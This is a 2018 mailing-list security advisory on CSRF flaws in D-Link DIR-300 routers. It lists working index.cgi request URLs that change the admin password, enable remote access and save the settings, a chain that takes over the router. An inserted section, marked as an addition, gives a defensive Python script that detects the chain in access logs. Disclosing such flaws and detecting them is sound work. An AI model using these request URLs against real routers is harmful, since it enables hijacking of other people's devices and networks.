Message-ID: <004c01d41aeb$93be3560$6700a8c0@pc>
Date: Fri, 13 Jul 2018 23:52:42 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] CSRF vulnerabilities in D-Link DIR-300
Hello list!
There are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300, following my previous advisory.
-------------------------
Affected products:
-------------------------
The following model is vulnerable: D-Link DIR-300NRUB5, firmware 1.2.94. All
previous versions must also be vulnerable.
----------
Details:
----------
After the previous AoF, BF and CSRF vulnerabilities, here are new Cross-Site
Request Forgery holes. To take control of the device, only a few CSRF
requests are needed: change the admin's password (the login is fixed, which is
the AoF vulnerability mentioned earlier), turn on remote access, and save the
settings.
Cross-Site Request Forgery (WASC-09):
Change admin's password:
http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|
Add settings to turn on remote access:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1
Change current settings to turn on remote access:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1
Delete settings of remote access:
http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1
Save all changes in settings of device:
http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y
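The chain above is a sequence of plain GET requests to index.cgi, so it leaves a recognisable trace in any HTTP access log kept on the device or on a proxy in front of it. The following script is an added example for defenders and is not part of this advisory: it parses a constructed access log, classifies each index.cgi request by the res_config_action, res_config_id and res_cmd parameters quoted above, flags state-changing requests whose Referer is not the device's own origin, and reports clients for which the complete takeover chain (password change, remote-access rule, save) was observed that way. The log format, the sample lines and the device address 192.168.0.1 are assumptions made for this example.

```python
"""Added example (not from the advisory): flag the DIR-300 CSRF chain in an
HTTP access log by parameter signature plus Referer origin check.
Log format, sample lines and DEVICE_ORIGIN are constructed/assumed."""

import re
from urllib.parse import parse_qs, urlsplit

# Assumed LAN origin of the router; a legitimate admin session issues these
# requests from pages served by this origin, so its Referer should match.
DEVICE_ORIGIN = "http://192.168.0.1"

# Constructed log lines: client, request line, status, Referer.
# Lines 1-3 replay the chain from the advisory with a foreign Referer;
# line 4 is a password change from the device's own UI; line 5 is harmless.
SAMPLE_LOG = """\
192.168.0.10 "GET /index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password| HTTP/1.1" 200 "http://evil.example/page.html"
192.168.0.10 "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22}&res_pos=-1 HTTP/1.1" 200 "http://evil.example/page.html"
192.168.0.10 "GET /index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y HTTP/1.1" 200 "http://evil.example/page.html"
192.168.0.10 "GET /index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=newpass| HTTP/1.1" 200 "http://192.168.0.1/index.cgi"
192.168.0.10 "GET /index.cgi?v2=y&rq=y HTTP/1.1" 200 "-"
"""

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')

# (res_config_action, res_config_id) pairs taken from the advisory URLs.
STATE_CHANGING = {
    ("3", "69"): "admin password change",
    ("3", "16"): "remote-access rule added/changed",
    ("2", "16"): "remote-access rule deleted",
}
CHAIN = {"admin password change", "remote-access rule added/changed", "save settings"}


def classify(path: str):
    """Return the state-changing action an index.cgi request performs, or None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/index.cgi"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    if q.get("res_cmd") == ["20"]:  # commit pending settings
        return "save settings"
    key = (q.get("res_config_action", [None])[0], q.get("res_config_id", [None])[0])
    return STATE_CHANGING.get(key)


def referer_class(referer: str) -> str:
    """'same-origin', 'cross-origin' or 'missing' relative to DEVICE_ORIGIN."""
    if referer in ("", "-"):
        return "missing"
    r, d = urlsplit(referer), urlsplit(DEVICE_ORIGIN)
    return "same-origin" if (r.scheme, r.netloc) == (d.scheme, d.netloc) else "cross-origin"


def find_csrf_suspects(log_text: str):
    """(client, action, referer_class, referer) for each state-changing request
    that did not come from a page served by the device itself."""
    suspects = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, path, _status, referer = m.groups()
        action = classify(path)
        if action is None:
            continue
        rc = referer_class(referer)
        if rc != "same-origin":
            suspects.append((client, action, rc, referer))
    return suspects


def full_chain_clients(suspects):
    """Clients for which every step of the takeover chain was flagged."""
    seen = {}
    for client, action, _rc, _ref in suspects:
        seen.setdefault(client, set()).add(action)
    return sorted(c for c, acts in seen.items() if CHAIN <= acts)


if __name__ == "__main__":
    found = find_csrf_suspects(SAMPLE_LOG)
    for client, action, rc, ref in found:
        print(f"{client}: {action} ({rc} Referer: {ref})")
    print("full chain observed from:", full_chain_clients(found))
```

A missing Referer is reported separately from a cross-origin one because browsers may strip it under a strict referrer policy, so it is a weaker signal than an explicit foreign origin; on the device side, the fix the check points to is the usual one for CSRF, rejecting state-changing requests that lack a per-session token or whose Origin/Referer is not the device's own.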
------------
Timeline:
------------
2016.03.17 - announced vulnerabilities in DIR-300 at my site.
2016.08.27 - disclosed the previous advisory about DIR-300 at my site.
2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/).
2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua